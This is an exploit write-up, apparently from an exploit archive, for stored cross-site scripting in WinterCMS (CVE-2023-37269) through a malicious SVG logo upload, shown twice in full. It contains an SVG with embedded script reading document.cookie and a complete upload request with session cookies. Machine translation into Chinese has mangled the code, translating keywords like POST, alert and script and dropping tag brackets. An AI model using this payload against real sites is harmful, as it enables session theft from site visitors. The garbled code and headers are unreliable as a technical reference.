#利用标题: Wintercms 1.2.3-持续的跨站点脚本
#利用作者: Abhishek Morla
#Google Dork: N/A
#日期: 2023-07-10
#供应商HomePage: https://wintercms.com/
#软件link: https://github.com/wintercms/winter
#版本: 1.2.2
#测试在: Windows64bit/mozila firefox
#CVE : CVE-2023-37269
#报告链接: https://github.com/wintercms/winter/security/advisories/ghsa-wjw2-4j7j-6gc3
#视频POC :
标题:应用程序很容易通过自定义徽标上传功能中的SVG文件上传持续的跨站点脚本
描述:
WinterCMS 1.2.3缺乏将SVG文件作为网站徽标上传的限制,使其容易受到持续的跨站点脚本(XSS)攻击的攻击。这种漏洞源于攻击者在SVG文件中嵌入恶意JavaScript内容的能力,该文件对所有用户(包括匿名访问者)仍然可见。因此,与受影响页面的任何用户互动都可以无意中触发恶意脚本的执行
有效:-
//image.svg
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(Document.Cookie);
/脚本
/svg
//发布请求
发布/后端/系统/设置/更新/冬季/后端/品牌http/1.1
HOST: 172.17.0.2
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:应用程序/JSON
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
CACHE-CONTROL:无缓存
X-重新要求- WITH: XMLHTTPREQUEST
X-CSRF-TOKEN: FK93D30VMHCAWWGMLTRY97VPOXAF4IPPHTUWIOC2
X-Winter-Request Handler: FormLogo:Oonupload
content-type:多部分/form-data;边界=------------------------------------ 186411693022341939203410401206
内容长度: 608
Origin: http://172.17.0.2
连接:关闭
cookie: Admin_auth=EYJPDII6IKV2DELCCWDSZSTZSTZWC5CDVICFZ1BNC9PSISINZHBHVLIJOIVFKYV1K3UNBKKUVNHSWF2NJVNJVNCLVCD xrwnkldqlfmenzxu2huni91t3c5afrtttr3vwqrvjkzg5pcfzttm1imzftzzkyfzkkywwwprv0fyrnjuz1vowxq0q2vutgrschhvcv RZDWTLSGYXA1KYZTH0RXVSCFDYSMF1VDZYZ1P0T1PYYWI5M1ZMVWTXUKHPEXG2U0L3NG9NG9ZWHHHNHHNTPT0ILCJTYWMIOIIIYNZK0OT nlowy2odzhyjfhmgy0m2y4mzk0njviy2fiowq0zjnjnjnjmthlotkxodzjymfmntzkzmy3mmzhmtm3ywjliiiiwiiiiwidgfnijoiin0%3d; bblang=en_us; winter_session=eyjpdii6imjfwhveb0qrtmo5yjzycmml6wm6wm1jt3c9psisinzhbhbhvlijoiqvdvdvz3r4ajvuwuzxe s83dkhiqvfhvvyxoe1uajqovnzoutwm1zgcufyoc9hahzfmle2r0llnjzdwvr6ehzqbdzqbdz5z1j1j1j1j1j1j1 akm5vknaqufzm1p 5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVk MMI4ZMMXMTJLMGU5YJM2MWJKYJNINJNINJEWZME2NTY4ZGQWYTDJNJAXMJRKMJRIN2M1NTBIOTNIIIIIIIIIIWIDGFNIJOIIIN0%3d
--------------------------------------------------------- 18641169302341939203410401206
content-disposition: form-data; name='file_data';文件名='image.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.domain);
/脚本
/svg
-------------------------------------------------------- 18641169302341939203410401206-
| --------------------------------------------------------------------------------------------------------------------------------------------------------------
#利用作者: Abhishek Morla
#Google Dork: N/A
#日期: 2023-07-10
#供应商HomePage: https://wintercms.com/
#软件link: https://github.com/wintercms/winter
#版本: 1.2.2
#测试在: Windows64bit/mozila firefox
#CVE : CVE-2023-37269
#报告链接: https://github.com/wintercms/winter/security/advisories/ghsa-wjw2-4j7j-6gc3
#视频POC :
描述:
WinterCMS 1.2.3缺乏将SVG文件作为网站徽标上传的限制,使其容易受到持续的跨站点脚本(XSS)攻击的攻击。这种漏洞源于攻击者在SVG文件中嵌入恶意JavaScript内容的能力,该文件对所有用户(包括匿名访问者)仍然可见。因此,与受影响页面的任何用户互动都可以无意中触发恶意脚本的执行
有效:-
//image.svg
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(Document.Cookie);
/脚本
/svg
//发布请求
发布/后端/系统/设置/更新/冬季/后端/品牌http/1.1
HOST: 172.17.0.2
用户- 代理: Mozilla/5.0(X11; Linux X86_64; RV:102.0)壁虎/20100101 Firefox/102.0
ACCEPT:应用程序/JSON
Accept-Language: en-us,en; q=0.5
Accept-incoding: Gzip,放气
CACHE-CONTROL:无缓存
X-重新要求- WITH: XMLHTTPREQUEST
X-CSRF-TOKEN: FK93D30VMHCAWWGMLTRY97VPOXAF4IPPHTUWIOC2
X-Winter-Request Handler: FormLogo:Oonupload
content-type:多部分/form-data;边界=------------------------------------ 186411693022341939203410401206
内容长度: 608
Origin: http://172.17.0.2
连接:关闭
cookie: Admin_auth=EYJPDII6IKV2DELCCWDSZSTZSTZWC5CDVICFZ1BNC9PSISINZHBHVLIJOIVFKYV1K3UNBKKUVNHSWF2NJVNJVNCLVCD xrwnkldqlfmenzxu2huni91t3c5afrtttr3vwqrvjkzg5pcfzttm1imzftzzkyfzkkywwwprv0fyrnjuz1vowxq0q2vutgrschhvcv RZDWTLSGYXA1KYZTH0RXVSCFDYSMF1VDZYZ1P0T1PYYWI5M1ZMVWTXUKHPEXG2U0L3NG9NG9ZWHHHNHHNTPT0ILCJTYWMIOIIIYNZK0OT nlowy2odzhyjfhmgy0m2y4mzk0njviy2fiowq0zjnjnjnjmthlotkxodzjymfmntzkzmy3mmzhmtm3ywjliiiiwiiiiwidgfnijoiin0%3d; bblang=en_us; winter_session=eyjpdii6imjfwhveb0qrtmo5yjzycmml6wm6wm1jt3c9psisinzhbhbhvlijoiqvdvdvz3r4ajvuwuzxe s83dkhiqvfhvvyxoe1uajqovnzoutwm1zgcufyoc9hahzfmle2r0llnjzdwvr6ehzqbdzqbdz5z1j1j1j1j1j1j1 akm5vknaqufzm1p 5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVk MMI4ZMMXMTJLMGU5YJM2MWJKYJNINJNINJEWZME2NTY4ZGQWYTDJNJAXMJRKMJRIN2M1NTBIOTNIIIIIIIIIIWIDGFNIJOIIIN0%3d
--------------------------------------------------------- 18641169302341939203410401206
content-disposition: form-data; name='file_data';文件名='image.svg'
content-type:图像/svg+xml
?xml版本='1.0'startalone='no'?
!
svg版本='1.1'基profile='full'xmlns='http://www.w3.org/2000/svg'
polygon id='三角形'suption='0,0 0,50 50,0'填充='#009900'stroke='#004400'/
脚本类型='text/javascript'
警报(document.domain);
/脚本
/svg
-------------------------------------------------------- 18641169302341939203410401206-
| --------------------------------------------------------------------------------------------------------------------------------------------------------------